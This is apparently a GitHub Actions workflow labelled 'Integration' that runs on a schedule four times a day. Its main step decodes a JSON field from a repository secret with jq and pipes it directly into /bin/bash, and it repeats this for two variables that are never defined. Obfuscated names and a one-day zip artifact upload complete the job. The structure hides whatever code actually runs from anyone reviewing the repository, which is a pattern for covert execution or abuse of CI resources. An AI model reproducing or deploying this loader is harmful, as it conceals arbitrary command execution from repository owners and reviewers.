name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '29 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          kcg91: ${{ secrets.kcg91 }}
        run: |
          printf '%s' "$kcg91" | jq -r .he30 | /bin/bash
          printf '%s' "$qfkti06" | jq -r .q89775 | /bin/bash
          printf '%s' "$fkqg18558" | jq -r .gqej1131 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: tkdBqOg4
          path: "*.zip"
          retention-days: 1
